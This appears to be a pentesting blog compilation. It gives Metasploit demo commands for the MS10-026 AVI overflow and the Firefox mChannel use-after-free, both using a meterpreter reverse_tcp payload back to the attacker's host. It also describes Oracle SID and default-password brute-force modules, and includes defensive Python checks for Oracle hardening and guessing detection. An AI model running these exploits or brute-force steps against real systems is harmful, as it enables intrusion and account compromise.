MS10-026 : Microsoft MPEG Layer-3 Audio Stack Based Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Yamata Li and submitted to Microsoft
Coordinated public release of the vulnerability on 2010-04-13
Metasploit PoC provided on 2011-08-12

PoC provided by :

Yamata Li
Shahin Ramezany
juan vazquez
Jordi Sanchez

Reference(s) :

CVE-2010-0480
OSVDB-63749
MS10-026 (KB977816)

Affected version(s) :

Microsoft Windows 2000 SP4
Windows XP SP2 and SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista, Windows Vista SP1, and Windows Vista SP2
Windows Vista x64, Windows Vista x64 SP1, and Windows Vista x64 SP2
Windows Server 2008 32-bit and Windows Server 2008 32-bit SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2

Tested on Windows XP SP3 with :

Internet Explorer 6

Description :

This module exploits a buffer overflow in l3codecx.ax while processing AVI files with MPEG Layer-3 audio content. The overflow only allows overwriting with 0's, so the three least significant bytes of the EIP value saved on the stack are overwritten, and the shellcode is mapped using the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. Please note that on IE 8 targets, your malicious URL must be a trusted site in order to load the .NET control.

Commands :

use exploit/windows/browser/ms10_026_avi_nsamplespersec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

Metasploit Oracle database enumeration (oraenum)

Metasploit provides one additional and useful Oracle database auxiliary module that lets you gather information about a database instance.

You can find all these auxiliary modules through the Metasploit search command.

To invoke this auxiliary module just type the following command :

This module scans the Oracle database server to gather the following information :

  • Oracle version (select * from v$version)
  • All values from v$parameter (select name,value from v$parameter)
  • If database audit trail is enabled or not
  • If database sys operations audit is enabled or not
  • If SQL92 security restriction on SELECT is enabled or not
  • If link encryption for logins is enabled or not
  • Provide you the UTL directory access configuration
  • Provide you the audit log directory configuration
  • Provide you the current account lockout time from the password policy
  • Provide you the number of authorized failed logins value before an account is locked from the password policy
  • Provide you the password grace time value from the password policy
  • Provide you the password lifetime value from the password policy
  • Provide you the number of times a password can be reused from the password policy
  • Provide you the maximum number of times a password needs to be changed before it can be reused from the password policy
  • Check if the password complexity is enabled or not
  • Provide you a list of all active accounts in format Username, Hash and Spare4
  • Provide you a list of all expired or locked accounts in format Username, Hash and Spare4
  • Provide you a list of all accounts with DBA privileges in format Username and Hash
  • Provide you a list of all accounts with ALTER, JAVA ADMIN, CREATE LIBRARY, CREATE ANY.
  • Check whether default passwords are set up on the database.
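Since every item in that list is also a hardening check, here is the same list evaluated from the defender's side. This is an added example, not code from the original post or from Metasploit: it takes rows shaped like the output of "select name, value from v$parameter" and "select resource_name, limit from dba_profiles where profile = 'DEFAULT'" (the sample rows below are constructed, modelled on an instance left at weak defaults) and reports the settings the oraenum module would surface. The parameter and profile names are the documented Oracle ones; the thresholds are assumptions chosen to match common Oracle hardening guides, not values from the page.

```python
"""Audit the Oracle settings that oraenum enumerates (added example).

Rows are constructed inline; a real run would fetch them with sqlplus or
cx_Oracle. Assumed column/parameter names follow the Oracle documentation.
"""

# Constructed sample of v$parameter rows (name -> value) for a weakly
# configured instance.
V_PARAMETER_WEAK = {
    "audit_trail": "NONE",
    "audit_sys_operations": "FALSE",
    "sql92_security": "FALSE",
    "remote_os_authent": "FALSE",
    "utl_file_dir": "*",
    "audit_file_dest": "/u01/app/oracle/admin/orcl/adump",
}

# The same instance after hardening (constructed, for comparison).
V_PARAMETER_HARDENED = {
    "audit_trail": "DB",
    "audit_sys_operations": "TRUE",
    "sql92_security": "TRUE",
    "remote_os_authent": "FALSE",
    "utl_file_dir": "",
    "audit_file_dest": "/u01/app/oracle/admin/orcl/adump",
}

# Constructed sample of the DEFAULT profile (resource_name -> limit).
DEFAULT_PROFILE_WEAK = {
    "FAILED_LOGIN_ATTEMPTS": "UNLIMITED",
    "PASSWORD_LOCK_TIME": "1",
    "PASSWORD_GRACE_TIME": "7",
    "PASSWORD_LIFE_TIME": "UNLIMITED",
    "PASSWORD_REUSE_TIME": "UNLIMITED",
    "PASSWORD_REUSE_MAX": "UNLIMITED",
    "PASSWORD_VERIFY_FUNCTION": "NULL",
}


def _bounded(limit, maximum):
    """True when a profile limit is numeric and no greater than `maximum`.

    'UNLIMITED', 'DEFAULT' and 'NULL' are all treated as unbounded.
    """
    try:
        return float(limit) <= maximum
    except ValueError:
        return False


def audit_parameters(params):
    """Return (parameter, finding) tuples for weak v$parameter values."""
    findings = []
    if params.get("audit_trail", "NONE").upper() == "NONE":
        findings.append(("audit_trail", "database audit trail is disabled"))
    if params.get("audit_sys_operations", "FALSE").upper() != "TRUE":
        findings.append(("audit_sys_operations", "SYSDBA/SYSOPER actions are not audited"))
    if params.get("sql92_security", "FALSE").upper() != "TRUE":
        findings.append(("sql92_security", "UPDATE/DELETE do not require SELECT privilege on the table"))
    if params.get("remote_os_authent", "FALSE").upper() == "TRUE":
        findings.append(("remote_os_authent", "remote OS authentication is trusted"))
    if params.get("utl_file_dir", "").strip() == "*":
        findings.append(("utl_file_dir", "UTL_FILE may read and write any directory on the server"))
    return findings


def audit_profile(profile, max_failed=10, max_life_days=180):
    """Return (limit, finding) tuples for weak password-policy limits."""
    findings = []
    if not _bounded(profile.get("FAILED_LOGIN_ATTEMPTS", "UNLIMITED"), max_failed):
        findings.append(("FAILED_LOGIN_ATTEMPTS", "accounts are never locked after failed logins"))
    if not _bounded(profile.get("PASSWORD_LIFE_TIME", "UNLIMITED"), max_life_days):
        findings.append(("PASSWORD_LIFE_TIME", "passwords never expire"))
    # Per the Oracle docs, reuse is only unrestricted when BOTH reuse limits
    # are UNLIMITED; if either one is a number the old password is blocked.
    reuse_time = profile.get("PASSWORD_REUSE_TIME", "UNLIMITED").upper()
    reuse_max = profile.get("PASSWORD_REUSE_MAX", "UNLIMITED").upper()
    if reuse_time == "UNLIMITED" and reuse_max == "UNLIMITED":
        findings.append(("PASSWORD_REUSE", "old passwords can be reused immediately"))
    if profile.get("PASSWORD_VERIFY_FUNCTION", "NULL").upper() == "NULL":
        findings.append(("PASSWORD_VERIFY_FUNCTION", "no password complexity is enforced"))
    return findings


if __name__ == "__main__":
    for name, findings in (("v$parameter (weak)", audit_parameters(V_PARAMETER_WEAK)),
                           ("v$parameter (hardened)", audit_parameters(V_PARAMETER_HARDENED)),
                           ("DEFAULT profile", audit_profile(DEFAULT_PROFILE_WEAK))):
        print(name, "->", len(findings), "finding(s)")
        for check, text in findings:
            print("  ", check, ":", text)
```

Running the block prints four findings for the weak parameter set, none for the hardened one, and four for the weak profile; the checker is deliberately read-only so it can run against the same views a pentester would query, without touching the configuration.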

CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo

Timeline :

Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to the vendor on 2011-02-17
Coordinated public release of the vulnerability on 2011-04-28
Metasploit PoC provided on 2011-08-10

PoC provided by :

regenrecht
Rh0

Reference(s) :

CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13

Affected version(s) :

Firefox 3.6.17 and below
Firefox 3.5.19 and below
SeaMonkey 2.0.14 and below

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a use-after-free vulnerability in Mozilla Firefox 3.6.16. An OBJECT element's mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECT's data attribute. (Discovered by regenrecht.) This module uses a heap spray with a minimal ROP chain to bypass DEP on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

Metasploit Oracle Database Auxiliary Modules

Metasploit provides several Oracle database auxiliary modules that let you brute force SIDs, brute force logins and execute SQL queries.

You can find all these auxiliary modules through the Metasploit search command.

Oracle TNS Listener SID enumeration scanner (sid_enum)

To invoke this auxiliary module just type the following command :

This module attempts to discover running Oracle TNS Listeners and the associated SID. For Oracle databases above 9.2.0.8 the listener is protected and the SID will have to be brute forced. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” can be a single IP address, an IP address range (e.g. 192.168.1.0-192.168.1.255 or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). To parallelize brute force attempts, increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener version scanner (tnslsnr_version)

To invoke this auxiliary module just type the following command :

This module attempts to discover running Oracle TNS Listeners and their versions. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” can be a single IP address, an IP address range or a file. To parallelize attempts, increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener information gathering (tnscmd)

To invoke this auxiliary module just type the following command :

This module sends TNS commands in order to gather information. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” can be a single IP address, an IP address range or a file. To parallelize attempts, increase the number of concurrent threads by setting the “THREADS” variable.

Oracle TNS Listener SID brute force – admin module (sid_brute)

To invoke this auxiliary module just type the following command :

This module attempts to discover running Oracle database SIDs. Just provide the target address in the “RHOST” variable; “RHOST” should be a single IP address. You can specify the number of seconds between each request with the “SLEEP” variable. Metasploit provides a common SID list file located at “/opt/metasploit3/msf3/data/wordlists/sid.txt”.

Oracle TNS Listener SID brute force – scanner module (sid_brute)

To invoke this auxiliary module just type the following command :

This module provides the same results as the “sid_brute” admin module, but with more module options and outputs. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” can be a single IP address, an IP address range or a file. Metasploit provides a common SID list file located at “/opt/metasploit3/msf3/data/wordlists/sid.txt”. To parallelize brute force attempts, increase the number of concurrent threads by setting the “THREADS” variable.

Oracle authentication brute force login – admin module (oracle_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate against an Oracle database using the username and password combinations listed in the “CSVFILE”. Metasploit provides a common login and password file at “/opt/metasploit3/msf3/data/wordlists/oracle_default_passwords.csv”. Provide the target address in the “RHOST” variable; “RHOST” should be a single IP address.

Oracle authentication brute force login – scanner module (oracle_login)

To invoke this auxiliary module just type the following command :

First of all, this module requires Nmap >= 5.50 installed on your Metasploit station. It provides the same results as the “oracle_login” admin module, but with more module options and outputs. You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” can be a single IP address, an IP address range or a file. The module attempts to authenticate against the Oracle instance using the username and password combinations given by the “USER_FILE”, “PASS_FILE” and “USERPASS_FILE” options. Metasploit provides a default “USERPASS_FILE” located at “/opt/metasploit3/msf3/data/wordlists/oracle_default_userpass.txt”. You can also use the SkullSecurity password lists, or my own list, which is updated regularly. To parallelize brute force attempts, increase the number of concurrent threads by setting the “THREADS” variable. Don't forget to configure the “RPORTS” variable, to “1521” for example.

All valid user and password combinations are shown in green, but you will also see valid accounts that are locked.
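Both the SID brute force modules and the login brute force modules above leave a distinctive trace on the server side, which is what a defender should be watching for. The following is an added example, not code from the original post or from Metasploit. It works on two constructed inputs: listener.log lines, whose layout is assumed to follow the usual "timestamp * connect_data * address * establish * sid * return code" form where return code 12505 means the listener does not know the requested SID; and rows shaped like dba_audit_session (username, OS host, returncode), where returncode 1017 is ORA-01017 "invalid username/password" (this assumes audit_trail is set to DB and AUDIT SESSION is enabled, otherwise no such rows exist). The thresholds are assumptions to tune per environment.

```python
"""Detect SID guessing and login guessing against an Oracle instance
(added example; sample data constructed inline)."""
import re
from collections import Counter, defaultdict

# Constructed listener.log excerpt: one normal connection, a run of unknown
# SIDs from a single source that ends with a hit, and one lone typo.
LISTENER_LINES = [
    "13-AUG-2011 10:15:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.5)(PORT=51000)) * establish * ORCL * 0",
    "13-AUG-2011 10:15:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.178.21)(PORT=41230)) * establish * TEST * 12505",
    "13-AUG-2011 10:15:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.178.21)(PORT=41231)) * establish * XE * 12505",
    "13-AUG-2011 10:15:02 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.178.21)(PORT=41232)) * establish * PROD * 12505",
    "13-AUG-2011 10:15:03 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.178.21)(PORT=41233)) * establish * DEV * 12505",
    "13-AUG-2011 10:15:03 * (CONNECT_DATA=(SID=OEMREP)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.178.21)(PORT=41234)) * establish * OEMREP * 12505",
    "13-AUG-2011 10:15:03 * (CONNECT_DATA=(SID=ORCL1)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.178.21)(PORT=41235)) * establish * ORCL1 * 12505",
    "13-AUG-2011 10:15:04 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.178.21)(PORT=41236)) * establish * ORCL * 0",
    "13-AUG-2011 10:16:10 * (CONNECT_DATA=(SID=ORCL10)(CID=(PROGRAM=sqlplus)(HOST=dba-ws)(USER=jsmith))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.0.0.9)(PORT=52001)) * establish * ORCL10 * 12505",
]

# Constructed dba_audit_session rows: (timestamp, username, os host, returncode).
AUDIT_ROWS = [
    ("13-AUG-2011 10:20:00", "SYS", "192.168.178.21", 1017),
    ("13-AUG-2011 10:20:00", "SYSTEM", "192.168.178.21", 1017),
    ("13-AUG-2011 10:20:01", "DBSNMP", "192.168.178.21", 1017),
    ("13-AUG-2011 10:20:01", "SCOTT", "192.168.178.21", 1017),
    ("13-AUG-2011 10:20:01", "OUTLN", "192.168.178.21", 1017),
    ("13-AUG-2011 10:20:02", "MDSYS", "192.168.178.21", 1017),
    ("13-AUG-2011 10:20:02", "CTXSYS", "192.168.178.21", 1017),
    ("13-AUG-2011 10:20:03", "SCOTT", "192.168.178.21", 0),
    ("13-AUG-2011 10:31:00", "JSMITH", "dba-ws", 1017),
    ("13-AUG-2011 10:31:20", "JSMITH", "dba-ws", 1017),
    ("13-AUG-2011 10:31:40", "JSMITH", "dba-ws", 0),
]

_HOST_RE = re.compile(r"\(ADDRESS=\(PROTOCOL=[^)]+\)\(HOST=([^)]+)\)")
_RESULT_RE = re.compile(r"\* establish \* (\S+) \* (\d+)\s*$")


def parse_listener_line(line):
    """Return (source_host, sid, return_code) or None for unparsable lines."""
    host = _HOST_RE.search(line)
    result = _RESULT_RE.search(line)
    if not host or not result:
        return None
    return host.group(1), result.group(1), int(result.group(2))


def sid_guessing(lines, threshold=5):
    """Map source host -> number of distinct unknown SIDs it asked for,
    keeping only hosts at or above `threshold` (TNS-12505 per attempt)."""
    unknown = defaultdict(set)
    for line in lines:
        parsed = parse_listener_line(line)
        if parsed and parsed[2] == 12505:
            unknown[parsed[0]].add(parsed[1])
    return {h: len(s) for h, s in unknown.items() if len(s) >= threshold}


def login_guessing(rows, threshold=5):
    """Map OS host -> (failed logins, sorted distinct usernames tried),
    keeping only hosts with at least `threshold` ORA-01017 results.
    Many distinct usernames from one host is the default-password-list
    pattern; the same username failing a few times is a forgotten password."""
    failures = Counter()
    users = defaultdict(set)
    for _ts, user, host, rc in rows:
        if rc == 1017:
            failures[host] += 1
            users[host].add(user)
    return {h: (n, sorted(users[h])) for h, n in failures.items() if n >= threshold}


if __name__ == "__main__":
    print("SID guessing:", sid_guessing(LISTENER_LINES))
    print("login guessing:", login_guessing(AUDIT_ROWS))
```

On the constructed data only 192.168.178.21 is reported in both detectors: six unknown SIDs followed by a successful connect, then seven ORA-01017 results across seven different usernames before one succeeds. The single TNS-12505 from 10.0.0.9 and the two failures from dba-ws stay below threshold, which is the point of counting distinct SIDs and usernames rather than raw connection volume.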

Oracle generic SQL query execution (oracle_sql)

To invoke this auxiliary module just type the following command :

This module attempts to execute a SQL query against the Oracle instance. The default SQL query checks the running version of the Oracle database. You will need a valid SID, login and password, previously discovered with the “sid_brute” and “oracle_login” auxiliary modules. Provide the target server in the “RHOST” variable; “RHOST” should be a single IP address.

Some useful Oracle SQL queries for pen testing are available on the pentestmonkey website.